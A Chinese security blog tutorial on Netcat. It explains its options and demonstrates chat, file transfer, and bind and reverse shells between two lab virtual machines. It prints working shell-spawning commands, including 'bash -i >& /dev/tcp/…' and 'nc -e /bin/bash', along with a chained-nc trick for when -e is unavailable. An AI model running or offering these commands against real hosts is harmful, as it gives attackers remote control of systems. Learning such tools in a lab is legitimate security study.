【网安神器篇】——瑞士军刀Netcat

2023-11-07 09:40

本文主要是介绍【网安神器篇】——瑞士军刀Netcat,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

作者名:Demo不是emo 

主页面链接:主页传送门
创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:梦里的你,一如往常般动人

 今天给大家分享的网络安全神器是网安界的瑞士军刀——Netcat

目录

一:Netcat简介

二:工具下载 

1. windows系统

2.linux系统

三:常用参数

四:常用功能

1.连接通讯 

[1]:服务端开启监听端口

[2]客户端连接监听端口

[3]实现连接通讯

2.文件传输

[1]接收端开启接收

[2]传输端开启传输 

[3]文件成功传输 

3.传输shell 

[1] 正向shell

 [2]反向shell

 五:拓展姿势

1.奇淫巧技 

2.博文总结 


一:Netcat简介

netcat称为网络工具中的瑞士军刀,体积小巧,但功能强大,为了方便常用nc作为其简称。 它可以在两台设备上面相互交互,主要就是侦听模式传输模式。大致功能如下:

  • Telnet功能
  • 获取banner信息
  • 传输文本信息
  • 传输文件/目录
  • 加密传输文件,默认不加密
  • 远程控制
  • 加密所有流量
  • 流媒体服务器
  • 远程克隆硬盘

因为今天主要介绍的是nc在网安中的应用,所以只会讲到其中的一部分功能

二:工具下载 

1. windows系统

Windows:https://eternallybored.org/misc/netcat/解压安装包,直接运行,无需安装

2.linux系统

输入下面命令即可安装(kali系统已经部署了预安装)

yum install nc

三:常用参数

 打开终端,输入nc -h即可查看到nc的使用帮助界面,即一些常用参数的作用(这里用kali演示,其他系统同样的操作即可),如下

考虑到这样大家可能看不大清楚,而且还全是英文,有可能看不懂,所以demo哥这里贴心的给大家写一份中文版的使用帮助,以表格形式呈现,如下

         参数                                               参数作用

            -l

                                设置netcat处于监听状态等待连接

           -L

设置netcat处于监听状态等待连接,当客户端断开,服务端依旧回到等待状态

           -p

                                           本地监听端口号

           -v

       显示端口信息,如果使用-vv的话,则显示更加详细的端口信息

           -e

                                执行某个程序,如cmd.exe

           -n

                        只识别IP地址,不对目标进行DNS解析

           -u

                         使用UDP模式(nc默认使用tcp连接)

           -z

  zero I/O模式,专用端口扫描。对目标IP发送的数据不包含payload,加快扫描

          -w1

                                        超时设置为1秒

           -d

          脱离命令窗口,在后台运行,常用于后门的建立过程

           -G

                        gateway 设置网关,用于内网突破限制

           -g

                                        num,路由调数

        -o :file

                                    设置传输16进制的数据

        -s:addr

                        设置netcat源地址,隐藏自己的ip地址

            -t

                                   恢复telnet的请求数据包
            -r                                设置netcat随机化的端口号

以上差不多就是nc比较常用的一些参数,众所周知,参数搭配在一起使用,就能完成某些特定的功能,所以下面我们就来介绍一下由各种命令搭配构成的nc常用功能

四:常用功能

 实验环境:

一台kali虚拟机(ip地址为192.168.149.129)和一台centos虚拟机(ip地址为192.168.149.133),两台机器网络在同一网段,能互相ping通,且都安装了nc工具

1.连接通讯 

服务端 监听端口: nc -lnvp 端口     客户端 连接端口: nc 服务端ip 端口     

 演示:

[1]:服务端开启监听端口

在kali端监听6666端口,如下

nc -lnvp 6666

[2]客户端连接监听端口

nc 192.168.149.129 6666

[3]实现连接通讯

经过上面的两个操作后,centos和kali已经建立起实时通讯了,在kali输入的内容会传输到centos,比如在kali输入nihao cnetos,如下

 在centos的连接页面也会接收到该信息,如下:

 同理此时在centos输入数据也会传送到kali,相当于建立了一个双向实时通讯连接,达到类似微信聊天的效果

2.文件传输

接收端:nc -lvp 端口 >传输的文件在本地保存的路径传输端:nc 接收端ip 端口 <要传输的文件路径

演示 :

我们在centos创建一个1.txt的文件,并用nc将其传输到kali

[1]接收端开启接收

我们还是选择通过6666端口来传输文件 

nc -lvp 6666 >2.txt
//即将接收到的数据保存到当前路径下的2.txt

[2]传输端开启传输 

 在centos上用nc将centos上的1.txt传输到kali上

nc 192.168.149.129 6666 <1.txt

[3]文件成功传输 

 可以看到kali端已经成功收到文件

3.传输shell 

shell传输分为正向shell反向shell ,理解正向和反向,主要就是分清客户端服务端,下面给大家详细介绍一下

[1] 正向shell

正向就是客户端主动连接服务端,也就是我们去找目标拿权限,获取服务端的shell,这里我们把kali作为客户端,来正向获取centos的shell权限

服务端:nc -lvp 端口 -e /bin/sh
//正向需要经过服务端的防火墙,所以在这一步之前要先关闭防火墙客户端:nc 服务端ip 端口        

演示 

centos关闭防火墙并打开shell监听 

kali连接监听端口获取shell

 到这里就成功kali就已经成功拿到centos的shell了,在kali的连接页面即可查看,如下:

 [2]反向shell

反向shell就是让目标把权限自己给我们,也就是服务端来找客户端并把shell给客户端,具体步骤如下

服务端反弹shell: bash反弹:bash -i >& /dev/tcp/客户端ip/端口 0>&1nc反 弹 :nc -e /bin/bash 客户端ip 端口
//反弹姿势还有很多,这里只列举了两种客户端开启监听: nc -lvp 端口

客户端开启监听

 服务端反弹shell

 成功将shell回弹到kali

 五:拓展姿势

1.奇淫巧技 

在用nc的正向shell时不仅要关心防火墙的情况,还要注意-e参数是否被支持,看看初始命令

nc -e /bin/bash 客户端ip 端口

如果此时-e参数不被支持,但你仍然想使用正向shell建立连接,应该怎么办呢?这就是要给大家讲的小技巧——nc串连,具体命令如下:

nc 客户端的ip 第一个端口|/bin/bash |nc 客户端的ip  第二个端口

 详细给大家讲一下服务端执行这条命令的意思

语句的前半部分服务端nc将shell回弹到客户端ip的第一个端口,此时客户端开启对第一个端口的监听并成功建立连接(但这里并不是交互式shell,看不到命令执行的结果),语句后半部分意思就是将用户在第一个端口建立的shell上的命令执行结果作为第二个端口的输出内容,此时用户再用客户端nc监听并连接第二个端口,这样就可以实现攻击者在第一个端口输入命令,在第二个端口就能看到命令执行的结果

这招巨好用,大家可以多看看或者下去自己试一下 

2.博文总结 

除此之外nc还有很多用法,不过平时用的比较多的其实就是用来监听回弹的shell,后面我也会出一期回弹shell姿势总结,大家有兴趣的也可以去了解一下,感谢大家的阅读

这篇关于【网安神器篇】——瑞士军刀Netcat的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/362779

相关文章

以后写代码都是AI自动写了,Cursor+Claude-3.5-Sonnet,Karpathy 点赞的 AI 代码神器。如何使用详细教程

Cursor 情况简介 AI 大神 Andrej Karpathy 都被震惊了!他最近在试用 VS Code Cursor +Claude Sonnet 3.5,结果发现这玩意儿比 GitHub Copilot 还好用! Cursor 在短短时间内迅速成为程序员群体的顶流神器,其背后的原因在于其默认使用 OpenAI 投资的 Claude-3.5-Sonnet 模型,这一举动不仅改变了代码生成

OBItools:Linux下的DNA条形码分析神器

在生物信息学领域,DNA条形码分析是一种非常常见的研究方法,用于物种鉴定、生态学和进化生物学研究。今天要介绍的工具就是专为此设计的——OBItools。这个工具集专门用于处理生态学和进化生物学中的DNA条形码数据,在Linux环境下运行。无论你是本科生还是刚入门的科研人员,OBItools都能为你提供可靠的帮助。 OBItools的功能亮点 OBItools是一个强大的工具包,特别适合DNA条形

探索Invoke:Python自动化任务的瑞士军刀

文章目录 探索Invoke:Python自动化任务的瑞士军刀背景:为何选择Invoke?`invoke`是什么?如何安装`invoke`?简单的`invoke`库函数使用方法场景应用:`invoke`在实际项目中的使用场景一:自动化测试场景二:代码格式化场景三:部署应用 常见问题与解决方案问题一:命令执行失败问题二:权限不足问题三:并发执行问题 总结 探索Invoke:P

AI文献综述神器,有这一款就够了!

我是娜姐 @迪娜学姐 ,一个SCI医学期刊编辑,探索用AI工具提效论文写作和发表。 当前的AI辅助文献综述的工具有很多,如果说功能最强大的,娜姐无疑要推SciSpace了。 SciSpace利用强大的AI算法,理解并建立研究论文之间的联系,可以大大提升文献综述的质量和效率。并且其功能还在不断更新和完善。        1 强大的语义搜索功能 传统的关键词搜索可能会遗漏相关文献,Sc

全能AI神器!工作效率提升80倍!Zmo.ai带你玩转AI做图!

今天,我要给大家介绍一款神器:Zmo.ai。 这个平台简直是做图神器,集多种功能于一身,让你像专业人士一样轻松创建和编辑图像,不需要任何美术与设计基础,真的非常适合我们这些“手残党”! 我们只需单击按钮即可从文本或图像生成令人惊叹的 AI 艺术、图像、动漫和逼真的照片,最关键的是它的功能真的很全啊! Zmo.ai旗下产品分类: AI照片生成器 AI动漫生成器 AI照片编辑器 A

PDF转PPT神器揭秘!3步操作,轻松打造2024年会议爆款PPT

现在是数字化的时代,PDF 和 PPT 对职场的人来说可重要了。PDF 文件格式稳,也好分享,所以大家都爱用。PPT 演示起来很厉害,在开会、讲座的时候特别管用。不过呢,要是有好多 PDF 文件,咋能快点把它们变成好看的 PPT 呢?这是很多职场人都发愁的事儿。今天呢,我给大家讲讲三款能把 PPDF转PPT的好工具,只要简单三步,就能让你轻松做出 2024 年开会用的爆款 PPT。 一、福昕高级

Windows 一键定时自动化任务神器 zTasker,支持语音报时+多项定时计划执行

简介 zTasker(详情请戳 官网)是一款完全免费支持定时、热键或条件触发的方式执行多种自动化任务的小工具,支持win7-11。其支持超过100种任务类型,50+种定时/条件执行方法,而且任务列表可以随意编辑、排列、移动、更改类型,支持任务执行日志,可覆盖win自带的热键,同时支持任务列表等数据的备份及自动更新等。 简言之,比微软系统自带的任务计划要强好几倍,至少灵活性高多了,能大幅提高电脑使

加密方式的判断---神器 hash_identifier

加密作为保障数据安全的一种方式,它不是现在才有的,它产生的历史相当久远,它是起源于要追溯于公元前2000年(几个世纪了),虽然它不是现在我们所讲的加密技术(甚至不叫加密),但作为一种加密的概念,确实早在几个世纪前就诞生了。当时埃及人是最先使用特别的象形文字作为信息编码的,随着时间推移,巴比伦、美索不达米亚和希腊文明都开始使用一些方法来保护他们的书面信息。 加密在网络上的作用就是防止有用或私有

【python 数据可视化】美丽漂亮的画图神器--pyecharts

今天我们介绍下pyechats 的用法和一个简单的例子。 安装: pip install pyecharts 步骤1:导入相关包: # 导入包import pandas as pdfrom pyecharts.charts import *from pyecharts import options as optsfrom pyecharts.globals import *f

【爬虫渲染神器】selenium 和pyppeteer 的动态渲染ajax反爬虫

许多网页是动态加载的网页,其中不乏使用了ajax异步技术,那么我们有没有一种渲染工具,直接省略分析过程,模拟浏览器渲染的操作呢,获取到我们想要的内容。当然有,下面我们介绍两种渲染工具的实战使用。 目标网站: http://www.porters.vip/verify/sign/ 点击参看详情页的里面内容。 前一篇文章,我们介绍了,js逆向分析两种方法JS逆向–签名验证反爬虫】sign签名验证